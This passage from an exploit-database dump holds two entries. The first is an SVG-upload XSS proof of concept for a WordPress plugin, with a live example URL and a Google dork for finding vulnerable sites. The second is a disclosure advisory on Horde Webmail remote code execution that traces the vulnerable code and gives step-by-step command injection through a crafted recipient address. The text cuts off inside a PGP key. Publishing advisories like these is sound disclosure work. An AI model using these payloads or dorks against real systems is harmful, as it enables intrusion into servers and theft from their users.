-34 c-5 -6 -11 -29 -14 -51 -4 -34 -4 -33 -4 11\r\n 0 35 4 51 14 51 8 0 9 -4 4 -11z m98 -3 c0 -11 -3 -13 -6 -5 -11 28 -23 -3\r\n -23 -64 l0 -64 -30 0 -31 0 3 63 c3 58 5 62 26 60 13 -2 25 4 28 12 8 21 34\r\n 19 33 -2z m8 -55 c-3 -7 -5 -2 -5 12 0 14 2 19 5 13 2 -7 2 -19 0 -25z m0 -50\r\n c-3 -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z m-107 -41 c0 -18 -2 -19\r\n -10 -7 -13 20 -13 43 0 35 6 -3 10 -16 10 -28z m103 3 c-3 -12 -8 -19 -11 -16\r\n -5 6 5 36 12 36 2 0 2 -9 -1 -20z\"/>\r\n <path d=\"M420 1004 l0 -114 30 0 30 0 0 113 0 114 -30 1 -30 1 0 -115z\"/>\r\n <path d=\"M600 1115 c-1 0 -2 -51 -3 -113 l-2 -112 88 0 88 0 -3 111 -3 111\r\n -83 1 c-45 1 -82 2 -82 2z m42 -43 c-7 -2 -12 -16 -13 -30 0 -15 -3 -21 -6\r\n -14 -8 21 6 64 19 56 9 -6 9 -9 0 -12z m95 3 c0 -8 -4 -12 -9 -9 -4 3 -8 9 -8\r\n 15 0 5 4 9 8 9 5 0 9 -7 9 -15z m-27 -70 l0 -65 -30 0 c-30 0 -30 0 -30 58 0\r\n 65 3 72 37 72 22 0 23 -4 23 -65z m-48 -85 c23 -9 23 -9 -3 -9 -27 -1 -40 15\r\n -38 47 0 12 3 10 9 -6 5 -12 20 -27 32 -32z m88 6 c0 -17 -2 -18 -10 -6 -7 11\r\n -10 11 -10 2 0 -7 -4 -11 -10 -7 -13 8 -2 32 15 32 9 0 15 -10 15 -21z\"/>\r\n <path d=\"M884 1111 c-2 -2 -4 -53 -4 -113 l0 -108 33 0 32 0 -3 114 -3 114\r\n -25 -2 c-14 0 -28 -3 -30 -5z m23 -53 c-3 -7 -5 -2 -5 12 0 14 2 19 5 13 2 -7\r\n 2 -19 0 -25z m13 -78 c0 -5 -4 -10 -10 -10 -5 0 -10 5 -10 10 0 6 5 10 10 10\r\n 6 0 10 -4 10 -10z\"/>\r\n <path d=\"M2020 1111 c-24 -5 -34 -11 -32 -21 2 -8 1 -12 -3 -8 -4 4 -25 -3\r\n -46 -14 -38 -20 -39 -21 -39 -77 0 -31 -3 -66 -6 -78 -6 -23 -5 -23 85 -23\r\n l91 0 0 115 c0 63 -3 114 -7 114 -5 -1 -24 -5 -43 -8z m29 -58 c-1 -17 -3 -21\r\n -6 -10 -2 9 -9 17 -14 17 -5 0 -9 5 -9 10 0 6 7 10 15 10 10 0 15 -9 14 -27z\r\n m-39 -48 l0 -65 -30 0 c-30 0 -30 0 -30 58 0 65 3 72 37 72 22 0 23 -4 23 -65z\r\n m-83 30 c0 -8 -4 -15 -9 -15 -10 0 -11 14 -1 23 9 10 10 9 10 -8z m16 -92 c4\r\n -19 2 -33 -3 -33 -6 0 -10 1 -10 3 -10 64 -10 81 -2 72 5 -5 12 -25 15 -42z\r\n m101 15 c-4 -13 -7 -29 -7 -35 0 -7 -6 -13 -12 -13 -9 0 -9 9 -1 35 6 19 15\r\n 35 19 35 5 0 5 -10 1 -22z\"/>\r\n <path d=\"M2210 1003 l0 -113 88 0 87 0 0 111 0 110 -88 2 -87 2 0 -112z m59\r\n 75 c6 -7 22 -13 34 -13 20 0 22 -6 25 -62 l3 -63 -31 0 -30 0 0 59 c0 36 -5\r\n 63 -13 69 -20 17 -10 -118 11 -140 9 -11 11 -18 4 -18 -19 0 -30 33 -32 100\r\n -1 36 -2 68 -1 73 2 11 15 9 30 -5z m90 -53 c-1 -77 -11 -110 -32 -111 -10 -1\r\n -12 0 -3 3 27 8 36 131 11 157 -14 13 -13 15 5 13 18 -1 20 -8 19 -62z\"/>\r\n <path d=\"M2530 1115 c0 0 -1 -51 -3 -113 l-2 -112 88 0 87 0 0 113 0 112 -85\r\n 0 c-47 0 -85 0 -85 0z m33 -67 c-7 -59 -13 -61 -13 -5 0 26 4 47 9 47 4 0 6\r\n -19 4 -42z m110 21 c-4 -15 -8 -17 -14 -8 -8 14 -3 29 11 29 4 0 6 -9 3 -21z\r\n m-33 -66 c0 -63 0 -63 -29 -63 -28 0 -29 1 -30 57 0 67 1 69 33 69 25 0 26 -2\r\n 26 -63z m34 -21 c-2 -67 -3 -72 -15 -72 -5 0 -7 5 -3 12 4 6 6 29 6 51 -2 33\r\n 3 57 11 57 1 0 1 -21 1 -48z\"/>\r\n <path d=\"M2800 1003 l0 -113 30 0 30 0 0 113 0 114 -30 0 -30 0 0 -114z m39\r\n 10 c-1 -67 -2 -67 -10 -23 -11 63 -11 90 1 90 6 0 9 -28 9 -67z\"/>\r\n <path d=\"M1870 1080 c-66 -23 -63 -23 -54 -8 4 7 3 8 -5 4 -6 -4 -9 -11 -6\r\n -15 7 -13 -65 -58 -112 -70 -23 -7 -67 -25 -98 -41 -58 -31 -95 -38 -95 -19 0\r\n 5 -4 8 -9 5 -5 -4 -22 -1 -38 5 -15 6 -40 12 -55 14 -15 2 -38 11 -52 20 -27\r\n 18 -98 33 -81 17 6 -5 36 -19 67 -32 32 -12 55 -26 52 -31 -3 -5 1 -6 9 -3 8\r\n 3 42 -4 75 -15 74 -25 109 -27 114 -5 2 9 37 30 87 50 47 19 85 33 86 31 1 -1\r\n -2 -15 -6 -32 -4 -16 -7 -22 -8 -12 -2 31 -26 13 -29 -21 -3 -30 -1 -32 27\r\n -32 31 0 31 0 32 58 l0 57 70 35 c39 19 75 41 81 47 13 16 14 16 -52 -7z\"/>\r\n <path d=\"M1180 770 c0 -5 5 -10 11 -10 5 0 7 5 4 10 -3 6 -8 10 -11 10 -2 0\r\n -4 -4 -4 -10z\"/>\r\n <path d=\"M150 634 c0 -74 4 -113 10 -109 6 3 10 26 10 50 0 44 0 44 33 39 46\r\n -7 97 26 97 63 0 50 -33 73 -104 73 l-46 0 0 -116z m111 86 c26 -14 24 -55 -3\r\n -74 -12 -9 -37 -16 -55 -16 -33 0 -33 0 -33 50 l0 50 36 0 c19 0 44 -5 55 -10z\"/>\r\n <path d=\"M562 638 c2 -69 7 -112 13 -110 6 1 10 24 10 50 0 44 2 47 24 44 13\r\n -2 44 -26 69 -53 24 -27 48 -46 53 -43 5 3 -11 26 -36 52 l-44 46 29 12 c44\r\n 19 51 61 16 91 -21 18 -39 23 -82 23 l-54 0 2 -112z m122 76 c21 -20 20 -30\r\n -4 -54 -13 -13 -33 -20 -60 -20 l-40 0 0 45 0 45 44 0 c27 0 51 -6 60 -16z\"/>\r\n <path d=\"M1023 729 c-57 -36 -67 -123 -20 -166 53 -49 105 -56 158 -20 44 29\r\n 62 81 47 131 -22 70 -118 98 -185 55z m142 -25 c38 -41 31 -116 -14 -151 -29\r\n -22 -95 -16 -125 12 -36 34 -37 105 -1 140 35 36 106 35 140 -1z\"/>\r\n <path d=\"M1521 658 c-1 -50 -7 -98 -13 -105 -6 -7 -26 -13 -45 -13 -20 0 -32\r\n -4 -28 -10 10 -17 60 -11 82 10 13 11 24 38 28 62 8 58 2 141 -12 145 -7 3\r\n -11 -27 -12 -89z\"/>\r\n <path d=\"M1830 645 c0 -58 -1 -108 -2 -112 -2 -5 32 -9 75 -11 48 -2 77 1 77\r\n 8 0 6 -27 10 -65 10 l-65 0 0 45 0 45 55 0 c30 0 55 5 55 10 0 6 -25 10 -55\r\n 10 l-55 0 0 40 0 40 65 0 c37 0 65 4 65 10 0 6 -32 10 -75 10 l-75 0 0 -105z\"/>\r\n <path d=\"M2278 734 c-32 -17 -58 -62 -58 -100 0 -61 59 -114 127 -114 29 0 83\r\n 26 83 40 0 15 -16 12 -30 -5 -15 -18 -82 -20 -112 -4 -11 6 -26 26 -34 46 -30\r\n 72 12 133 92 133 23 0 46 -4 49 -10 7 -12 35 -13 35 -2 0 30 -107 41 -152 16z\"/>\r\n <path d=\"M2660 740 c0 -5 21 -10 46 -10 l45 0 -2 -102 c-1 -69 2 -103 10 -106\r\n 8 -3 11 28 11 102 l0 106 45 0 c25 0 45 5 45 10 0 6 -40 10 -100 10 -60 0\r\n -100 -4 -100 -10z\"/>\r\n <path d=\"M481 504 c0 -11 3 -14 6 -6 3 7 2 16 -1 19 -3 4 -6 -2 -5 -13z\"/>\r\n <path d=\"M2805 381 c-24 -5 -35 -17 -57 -59 l-27 -53 -27 55 c-25 52 -30 56\r\n -62 56 l-34 0 48 -67 c40 -56 48 -75 49 -113 0 -43 1 -45 30 -45 29 0 30 1 27\r\n 43 -3 37 2 50 47 112 28 38 47 71 43 73 -4 2 -20 1 -37 -2z m-78 -163 c-3 -8\r\n -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z\"/>\r\n <path d=\"M157 268 l2 -113 28 0 28 1 3 112 3 112 -33 0 -33 0 2 -112z\"/>\r\n <path d=\"M340 266 l0 -113 25 0 c24 0 25 2 25 62 0 43 -5 66 -15 75 -18 15\r\n -16 57 2 57 15 0 17 -13 3 -22 -5 -3 -7 -12 -3 -21 3 -8 8 -13 10 -10 3 2 27\r\n -21 55 -52 70 -79 70 -79 96 -87 22 -6 22 -6 22 109 l0 116 -25 0 c-24 0 -25\r\n -2 -25 -64 0 -53 3 -65 18 -69 14 -4 14 -5 -3 -6 -13 0 -41 24 -80 68 -40 46\r\n -68 70 -82 70 -23 1 -23 -1 -23 -113z m65 54 c-3 -5 -12 -10 -18 -10 -7 0 -6\r\n 4 3 10 19 12 23 12 15 0z m115 -115 c0 -8 -2 -15 -4 -15 -2 0 -6 7 -10 15 -3\r\n 8 -1 15 4 15 6 0 10 -7 10 -15z\"/>\r\n <path d=\"M696 355 c-30 -27 -29 -26 -17 -58 7 -17 25 -30 60 -43 54 -19 64\r\n -36 31 -54 -15 -8 -27 -7 -49 4 -26 14 -30 14 -45 -3 -15 -17 -14 -19 24 -36\r\n 52 -23 104 -12 134 28 19 26 19 30 6 54 -9 15 -33 32 -60 42 -27 10 -46 24\r\n -48 35 -3 15 3 17 49 14 43 -2 54 0 57 13 3 19 -24 29 -79 29 -25 0 -45 -8\r\n -63 -25z\"/>\r\n <path d=\"M950 268 l0 -113 82 2 c77 1 83 3 86 24 4 21 1 22 -52 16 l-56 -6 0\r\n 30 c0 28 2 29 44 29 40 0 44 2 39 21 -5 18 -11 19 -44 14 -38 -7 -39 -6 -39\r\n 24 0 31 0 31 55 31 48 0 55 2 55 20 0 18 -7 20 -85 20 l-85 0 0 -112z m37 60\r\n c-3 -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z m9 -56 c-4 -26 -21 -24\r\n -22 2 -1 16 3 23 11 20 7 -3 12 -13 11 -22z\"/>\r\n <path d=\"M1260 365 c-46 -25 -67 -92 -44 -141 29 -61 103 -87 167 -60 60 24\r\n 44 54 -19 37 -68 -19 -115 29 -94 95 13 38 32 46 99 42 28 -2 45 1 48 9 11 30\r\n -110 44 -157 18z\"/>\r\n <path d=\"M1522 289 c3 -82 5 -92 28 -109 36 -28 83 -33 126 -15 55 23 63 39\r\n 64 133 l0 82 -30 0 -30 0 0 -78 c0 -85 -8 -102 -50 -102 -42 0 -50 17 -50 102\r\n l0 78 -31 0 -31 0 4 -91z m188 -69 c-6 -11 -13 -20 -16 -20 -2 0 0 9 6 20 6\r\n 11 13 20 16 20 2 0 0 -9 -6 -20z\"/>\r\n <path d=\"M1860 267 l0 -114 31 0 c30 0 31 1 27 44 -3 35 0 43 14 43 10 0 27\r\n -17 40 -39 17 -31 30 -40 57 -45 19 -3 37 -3 40 -1 2 3 -15 27 -37 54 -39 46\r\n -40 50 -22 56 26 8 40 36 33 64 -8 32 -54 51 -123 51 l-60 0 0 -113z m125 63\r\n c12 -20 -6 -47 -38 -57 l-32 -10 3 39 c4 34 7 38 32 38 16 0 32 -5 35 -10z\r\n m32 -12 c-3 -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z m-120 -70 c-3\r\n -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z\"/>\r\n <path d=\"M2160 266 l0 -113 30 1 30 1 0 113 0 112 -30 0 -30 0 0 -114z m37\r\n -38 c-3 -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z\"/>\r\n <path d=\"M2320 360 c0 -17 7 -20 40 -20 l40 0 0 -93 0 -94 30 0 30 0 0 94 0\r\n 93 35 0 c28 0 35 4 35 20 0 19 -7 20 -105 20 -98 0 -105 -1 -105 -20z m110\r\n -35 c0 -5 -5 -3 -10 5 -5 8 -10 20 -10 25 0 6 5 3 10 -5 5 -8 10 -19 10 -25z\r\n m8 -56 c-3 -20 -5 -19 -9 9 -3 20 -2 29 4 23 5 -5 7 -19 5 -32z\"/>\r\n <path d=\"M818 123 c7 -3 16 -2 19 1 4 3 -2 6 -13 5 -11 0 -14 -3 -6 -6z\"/>\r\n </g>\r\n <script type=\"text/javascript\">\r\n alert(\"@insecurity\");\r\n </script>\r\n</svg>\r\n\r\n-------------------------------------------------------------------------------------------------------------\r\n\r\nHere is a live example: \r\n https://www.saltsidecreations.com/wp-content/uploads/fancy_products_uploads/2017/04/28/insecurity.svg\r\n\r\nThis could have a variety of impacts ranging from stealing cookies and regular XSS-related risks to a highly\r\neffective spear phishing campaign\r\n\r\nGoogle Dork: inurl:fancy_products_uploads\r\n\r\n-------------------------------------------------------------------------------------------------------------\r\n\r\nHow to fix: Use whitelist for file upload (e.g. only allow JPG and PNG, no .svg)\r\n\r\nThere's also multiple full path disclosure for this plugin but WP is riddled with FPD. If you're interested then \r\nget in touch (although im pretty sure there's tons of files in /wp-includes/ that will give you FPD anyway presuming no error_reporting(0) set)\n\n# 0day.today [2018-02-15] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/27710"}, {"lastseen": "2018-04-02T05:26:12", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2017-04-12T00:00:00", "published": "2017-04-12T00:00:00", "href": "https://0day.today/exploit/description/27576", "id": "1337DAY-ID-27576", "title": "Horde Groupware Webmail 3 / 4 / 5 - Multiple Remote Code Execution Vulnerabilities", "type": "zdt", "sourceData": "Source: https://blogs.securiteam.com/index.php/archives/3107\r\n \r\nVulnerabilities Summary\r\nThe following advisory describes two (2) vulnerabilities found in\r\nHorde Groupware Webmail.\r\n \r\nHorde Groupware Webmail Edition is a free, enterprise ready, browser\r\nbased communication suite. Users can read, send and organize email\r\nmessages and manage and share calendars, contacts, tasks, notes,\r\nfiles, and bookmarks with the standards compliant components from the\r\nHorde Project. Horde Groupware Webmail Edition bundles the separately\r\navailable applications IMP, Ingo, Kronolith, Turba, Nag, Mnemo,\r\nGollem, and Trean.\r\n \r\nIt can be extended with any of the released Horde applications or the\r\napplications that are still in development, like a bookmark manager or\r\na file manager.\r\n \r\nAffected versions: Horde 5, 4 and 3\r\n \r\nThe vulnerabilities found in Horde Groupware Webmail are:\r\n \r\nAuthentication Remote Code Execution\r\nUnauthentication Remote Code Execution\r\n \r\nCredit\r\nAn independent security researcher has reported this vulnerability to\r\nBeyond Security\u2019s SecuriTeam Secure Disclosure program.\r\n \r\nVendor response\r\nHorde has released a patch to address the vulnerabilities.\r\n \r\nFor more information:\r\nhttps://lists.horde.org/archives/horde/Week-of-Mon-20170403/056767.html\r\n \r\nVulnerabilities Details\r\n \r\nAuthentication Remote Code Execution\r\nHorde Webmail contains a vulnerability that allows a remote attacker\r\nto execute arbitrary code with the privileges of the user who runs the\r\nweb server.\r\n \r\nFor successful attack GnuPG feature should be enabled on the target\r\nserver (path to gpg binary should be defined in $conf[gnupg][path]\r\nsetting).\r\n \r\nVulnerable code: encryptMessage() function of GPG feature.\r\n \r\nPath: /Horde/Crypt/Pgp/Backend/Binary.php:\r\n \r\n/* 416 */ public function encryptMessage($text, $params)\r\n/* 417 */ {\r\n/* \u2026 */\r\n/* 435 */ foreach (array_keys($params['recips']) as $val) {\r\n/* 436 */ $cmdline[] = '--recipient ' . $val;\r\n#! vulnerable code\r\n/* \u2026 */\r\n/* 444 */ /* Encrypt the document. */\r\n/* 445 */ $result = $this->_callGpg(\r\n/* 446 */ $cmdline,\r\n/* 447 */ 'w',\r\n/* 448 */ empty($params['symmetric']) ? null : $params['passphrase'],\r\n/* 449 */ true,\r\n/* 450 */ true\r\n/* 451 */ );\r\n \r\n$params[\u2018recips\u2019] will be added to $cmdline array and passed to _callGpg():\r\n \r\nPath: /Horde/Crypt/Pgp/Backend/Binary.php:\r\n \r\n/* 642 */ public function _callGpg(\r\n/* 643 */ $options, $mode, $input = array(), $output = false, $stderr = false,\r\n/* 644 */ $parseable = false, $verbose = false\r\n/* 645 */ )\r\n/* 646 */ {\r\n/* \u2026 */\r\n/* 675 */ $cmdline = implode(' ', array_merge($this->_gnupg, $options));\r\n/* \u2026 */\r\n/* 681 */ if ($mode == 'w') {\r\n/* 682 */ if ($fp = popen($cmdline, 'w')) { #!\r\nvulnerable code\r\n/* \u2026 */\r\n \r\nWe can see that our recipients (addresses) will be in command line\r\nthat is going to be executed. encryptMessage() function can be reached\r\nby various API, requests. For example it will be called when user try\r\nto send encrypted message.\r\n \r\nOur request for encryption and sending our message will be processed\r\nby buildAndSendMessage() method:\r\nPath: /imp/lib/Compose.php\r\n \r\n/* 733 */ public function buildAndSendMessage(\r\n/* 734 */ $body, $header, IMP_Prefs_Identity $identity, array $opts = array()\r\n/* 735 */ )\r\n/* 736 */ {\r\n/* 737 */ global $conf, $injector, $notification, $prefs, $registry, $session;\r\n/* 738 */\r\n/* 739 */ /* We need at least one recipient & RFC 2822 requires that no 8-bit\r\n/* 740 */ * characters can be in the address fields. */\r\n/* 741 */ $recip = $this->recipientList($header);\r\n/* ... */\r\n/* 793 */ /* Must encrypt & send the message one recipient at a time. */\r\n/* 794 */ if ($prefs->getValue('use_smime') &&\r\n/* 795 */ in_array($encrypt, array(IMP_Crypt_Smime::ENCRYPT,\r\nIMP_Crypt_Smime::SIGNENC))) {\r\n/* ... */\r\n/* 807 */ } else {\r\n/* 808 */ /* Can send in clear-text all at once, or PGP can encrypt\r\n/* 809 */ * multiple addresses in the same message. */\r\n/* 810 */ $msg_options['from'] = $from;\r\n/* 811 */ $save_msg = $this->_createMimeMessage($recip['list'], $body,\r\n$msg_options); #! vulnerable code\r\n \r\nIn line 741 it tries to create recipient list: Horde parsers values of\r\n\u2018to\u2019, \u2018cc\u2019, \u2018bcc\u2019 headers and creates list of Rfc822 addresses. In\r\ngeneral there are restrictions for characters in addresses but if we\r\nwill use the next format:\r\n \r\ndisplay-name <\"somemailbox\"@somedomain.com>\r\n \r\nsomemailbox will be parsed by _rfc822ParseQuotedString() method:\r\n \r\nPath: /Horde/Mail/Rfc822.php:\r\n \r\n/* 557 */ protected function _rfc822ParseQuotedString(&$str)\r\n/* 558 */ {\r\n/* 559 */ if ($this->_curr(true) != '\"') {\r\n/* 560 */ throw new Horde_Mail_Exception('Error when parsing a quoted string.');\r\n/* 561 */ }\r\n/* 563 */ while (($chr = $this->_curr(true)) !== false) {\r\n/* 564 */ switch ($chr) {\r\n/* 565 */ case '\"':\r\n/* 566 */ $this->_rfc822SkipLwsp();\r\n/* 567 */ return;\r\n/* 569 */ case \"\\n\":\r\n/* 570 */ /* Folding whitespace, remove the (CR)LF. */\r\n/* 571 */ if (substr($str, -1) == \"\\r\") {\r\n/* 572 */ $str = substr($str, 0, -1);\r\n/* 573 */ }\r\n/* 574 */ continue;\r\n/* 576 */ case '\\\\':\r\n/* 577 */ if (($chr = $this->_curr(true)) === false) {\r\n/* 578 */ break 2;\r\n/* 579 */ }\r\n/* 580 */ break;\r\n/* 581 */ }\r\n/* 583 */ $str .= $chr;\r\n/* 584 */ }\r\n/* 586 */ /* Missing trailing '\"', or partial quoted character. */\r\n/* 587 */ throw new Horde_Mail_Exception('Error when parsing a quoted string.');\r\n/* 588 */ }\r\n \r\nThere are only a few limitations:\r\n \r\nwe cannot use \u201c\r\n\\n will be deleted\r\nwe cannot use \\ at the end of our mailbox\r\n \r\nAfter creation of recipient list buildAndSendMessage() will call\r\n_createMimeMessage():\r\n \r\nPath: /imp/lib/Compose.php\r\n \r\n/* 1446 */ protected function _createMimeMessage(\r\n/* 1447 */ Horde_Mail_Rfc822_List $to, $body, array $options = array()\r\n/* 1448 */ )\r\n/* 1449 */ {\r\n/* 1450 */ global $conf, $injector, $prefs, $registry;\r\n/* ... */\r\n/* 1691 */ /* Set up the base message now. */\r\n/* 1692 */ $encrypt = empty($options['encrypt'])\r\n/* 1693 */ ? IMP::ENCRYPT_NONE\r\n/* 1694 */ : $options['encrypt'];\r\n/* 1695 */ if ($prefs->getValue('use_pgp') &&\r\n/* 1696 */ !empty($conf['gnupg']['path']) &&\r\n/* 1697 */ in_array($encrypt, array(IMP_Crypt_Pgp::ENCRYPT,\r\nIMP_Crypt_Pgp::SIGN, IMP_Crypt_Pgp::SIGNENC,\r\nIMP_Crypt_Pgp::SYM_ENCRYPT, IMP_Crypt_Pgp::SYM_SIGNENC))) {\r\n/* 1698 */ $imp_pgp = $injector->getInstance('IMP_Crypt_Pgp');\r\n/* ... */\r\n/* 1727 */ /* Do the encryption/signing requested. */\r\n/* 1728 */ try {\r\n/* 1729 */ switch ($encrypt) {\r\n/* ... */\r\n/* 1735 */ case IMP_Crypt_Pgp::ENCRYPT:\r\n/* 1736 */ case IMP_Crypt_Pgp::SYM_ENCRYPT:\r\n/* 1737 */ $to_list = clone $to;\r\n/* 1738 */ if (count($options['from'])) {\r\n/* 1739 */ $to_list->add($options['from']);\r\n/* 1740 */ }\r\n/* 1741 */ $base = $imp_pgp->IMPencryptMIMEPart($base, $to_list,\r\n($encrypt == IMP_Crypt_Pgp::SYM_ENCRYPT) ?\r\n$symmetric_passphrase : null);\r\n/* 1742 */ break;\r\n \r\nHere we can see validation (1695-1696 lines) that:\r\n \r\nCurrent user has enabled \u201cuse_pgp\u201d feature in his preferences (it is\r\nnot a problem as an attacker can edit his own preferences)\r\n$conf[\u2018gnupg\u2019][\u2018path\u2019] is not empty. This value can be edited only by\r\nadmin. So if we don\u2019t have value here our server is not vulnerable.\r\nBut if admin wants to allow users to use GPG feature he/she needs to\r\ndefine value for this config.\r\n \r\nAlso we can see that in lines 1737-1739 to our recipient list will be\r\nadded address \u201cfrom\u201d as well.\r\n \r\nPath: /imp/lib/Crypt/Pgp.php\r\n \r\n/* 584 */ public function impEncryptMimePart($mime_part,\r\n/* 585 */ Horde_Mail_Rfc822_List $addresses,\r\n/* 586 */ $symmetric = null)\r\n/* 587 */ {\r\n/* 588 */ return $this->encryptMimePart($mime_part,\r\n$this->_encryptParameters($addresses, $symmetric));\r\n/* 589 */ }\r\n \r\nBefore encryptMimePart() call Horde uses _encryptParameters()\r\n \r\nPath: /imp/lib/Crypt/Pgp.php\r\n \r\n/* 536 */ protected function _encryptParameters(Horde_Mail_Rfc822_List\r\n$addresses,\r\n/* 537 */ $symmetric)\r\n/* 538 */ {\r\n/* ... */\r\n/* 546 */ $addr_list = array();\r\n/* 548 */ foreach ($addresses as $val) {\r\n/* 549 */ /* Get the public key for the address. */\r\n/* 550 */ $bare_addr = $val->bare_address;\r\n/* 551 */ $addr_list[$bare_addr] = $this->getPublicKey($bare_addr);\r\n/* 552 */ }\r\n/* 554 */ return array('recips' => $addr_list);\r\n/* 555 */ }\r\n \r\nHorde will add to each address its Public Key. There a few source of\r\nPublic Keys:\r\n \r\nAddressBook (we will use this source)\r\nServers with Public Keys\r\n \r\nNote that Horde should be able to find Public Key for our \u201cFrom\u201d\r\naddress as well.\r\nWe can generate pair of PGP keys (https is required) or we can use the\r\nsame trick with AddressBook (we can create some contact, add any valid\r\nPublic PGP key, and add this address to default identity)\r\nencryptMimePart() will call encrypt() method\r\n \r\nPath: /Horde/Crypt/Pgp.php\r\n \r\n/* 773 */ public function encryptMIMEPart($mime_part, $params = array())\r\n/* 774 */ {\r\n/* 775 */ $params = array_merge($params, array('type' => 'message'));\r\n/* \u2026 */\r\n/* 781 */ $message_encrypt = $this->encrypt($signenc_body, $params);\r\n \r\nIt will call encryptMessage()\r\n \r\nPath: /Horde/Crypt/Pgp.php\r\n \r\n/* 554 */ public function encrypt($text, $params = array())\r\n/* 555 */ {\r\n/* 556 */ switch (isset($params['type']) ? $params['type'] : false) {\r\n/* 557 */ case 'message':\r\n/* 558 */ $error = Horde_Crypt_Translation::t(\r\n/* 559 */ \"Could not PGP encrypt message.\"\r\n/* 560 */ );\r\n/* 561 */ $func = 'encryptMessage';\r\n/* 562 */ break;\r\n/* ... */\r\n/* 586 */ $this->_initDrivers();\r\n/* 587 */\r\n/* 588 */ foreach ($this->_backends as $val) {\r\n/* 589 */ try {\r\n/* 590 */ return $val->$func($text, $params);\r\n/* 591 */ } catch (Horde_Crypt_Exception $e) {}\r\n/* 592 */ }\r\n \r\nIn conclusions:\r\nIf Horde server has enabled \u201cGnuPG feature\u201d any unprivileged user is\r\nable to execute arbitrary code.\r\n \r\nEnable GPG feature for attacker account (\u201cEnable PGP functionality?\u201d\r\ncheckbox on \u201cPGP Configure PGP encryption support.\u201d section in\r\nPrefferences->Mail page )\r\nCreate some contact in the attacker AddressBook, add any valid Public\r\nPGP key, and add this address to default identity\r\nCreate another contact in the attacker AddressBook, add any valid\r\nPublic PGP key, and change email address to some$(desired command to\r\nexecute) [email\u00a0protected]\r\nCreate a new message to some$(desired command to execute) [email\u00a0protected]\r\nChoose Encryption:PGP Encrypt Message option\r\nClick Send button\r\n \r\nAnd desired command will be executed on the Horde server.\r\n \r\nProof of Concept \u2013 Authenticated Code Execution\r\n \r\nFor Proof of Concept we can use preconfigured image of Horde server\r\nfrom Bitnami (Bitnami \u2013 \u201cEasy to use cloud images, containers, and VMs\r\nthat work on any platform\u201d):\r\n \r\nhttps://downloads.bitnami.com/files/stacks/horde/5.2.17-0/bitnami-horde-5.2.17-0-linux-ubuntu-14.04-x86_64.ova\r\n \r\nStep 1 \u2013 Login as admin (by default user:bitnami) and go to\r\nAdministration -> Configuration and choose Horde (horde). Open GnuPG\r\ntab, enter /usr/bin/gpg into $conf[gnupg][path] setting and click\r\n\u201cGenerate Horde Configuration\u201c:\r\n \r\nNow we have enabled GPG feature on our server and we can login as\r\nregular user and try to execute desired commands. But Bitnami image\r\ndoes not have installed and configured Mail server so we need to use\r\nexternal one or install it on local machine.\r\n \r\nWe will use gmail account (to be able to login to it from Horde I had\r\nto change Gmail account setting Allow less secure apps: ON).\r\n \r\nTo use external Mail server we need to change the next setting:\r\n\u201cAdministrator Panel\u201d -> \u201cConfiguration\u201d -> \u201cHorde\u201d ->\r\n\u201cAuthentication\u201d\r\n \r\nStep 2 \u2013 Configure Horde web-mail authentication ($conf[auth][driver])\r\nto \u201cLet a Horde application handle authentication\u201d and click \u201cGenerate\r\nHorde Configuration\u201d:\r\n \r\nStep 3 \u2013 logout and login with your gmail account. Currently we are\r\nlogin as regular user so we can try to execute desired commands:\r\n \r\nGo to Preferences -> Mail and click on PGP link. Check Enable PGP\r\nfunctionality? checkbox and click \u201cSave\u201d:\r\n \r\nCreate \u201cfrom\u201d contact in our AddressBook: \u201cAddress Book -> New Contact\r\n-> in Address Book of \u2026\u201d\r\n \r\nPersonal tab \u2013 Last Name: mymailboxwithPGPkey\r\nCommunication tab \u2013 Email: [email\u00a0protected]\r\nOther tab \u2013 PGP Public Key: any valid Public PGP key.\r\n \r\nFor example:\r\n \r\n-----BEGIN PGP PUBLIC KEY BLOCK-----\r\nVersion: SKS 1.1.6\r\nComment: Hostname: keyserver.ubuntu.com\r\nmQGiBDk89iARBADhB7AyHQ/ZBlZjRRp1/911XaXGGmq1LDLTUTCAbJyQ1TzKDdetfT9Szk01\r\nYPdAnovgzxTS89svuVHP/BiqLqhJMl2FfMLcJX+va+DujGuLDCZDHi+4czc33N3z8ArpxzPQ\r\n5bfALrpNMJi6v2gZkDQAjMoeKrNEfXLCXQbTYWCuhwCgnZZCThya4xhmlLCTkwsQdMjFoj8D\r\n/iOIP/6W27opMJgZqTHcisFPF6Kqyxe6GAftJo6ZtLEG26k2Qn3O0pghDz2Ql4aDVki3ms82\r\nz77raSqbZVJzAFPzYoIKuc3JOoxxE+SelzSzj4LuQRXYKqZzT8/qYBCLg9cmhdm8PnwE9fd/\r\nPOGnNQFMk0i2xSz0FMr9R1emIKNsA/454RHIZ39ebvZzVULS1pSo6cI7DAJFQ3ejJqEEdAbr\r\n72CW3eFUAdF+4bJQU/V69Nr+CmziBbyqKP6HfiUH9u8NLrYuK6XWXLVVSCBPsOxHxhw48hch\r\nzVxJZ5Cyo/tMSOY/CxvLL/vMoT2+kQX1SCsWALosKJyOGbpCJmPasOLKdrQnQWxpY2UgKFJl\r\nY2h0c2Fud8OkbHRpbikgPGFsaWNlQGN5Yi5vcmc+iEYEEBECAAYFAjk+IEgACgkQzDSD4hsI\r\nfQSaWQCgiDvvnRxa8XFOKy/NI7CKL5X4D28An2k9Cbh+dosXvB5zGCuQiAkLiQ+CiEYEEREC\r\nAAYFAkKTPFcACgkQCY+3LE2/Ce4l+gCdFSHqp5HQCMKSOkLodepoG0FiQuwAnR2nioCQ3A5k\r\nYI0NfUth+0QzJs1ciFYEExECABYFAjk89iAECwoEAwMVAwIDFgIBAheAAAoJEFsqCm37V5ep\r\nfpAAoJezEplLlaGQHM8ppKReVHSyGuX+AKCYwRcwJJwoQHM8p86xhSuC/opYPoheBBMRAgAW\r\nBQI5PPYgBAsKBAMDFQMCAxYCAQIXgAASCRBbKgpt+1eXqQdlR1BHAAEBfpAAoJezEplLlaGQ\r\nHM8ppKReVHSyGuX+AK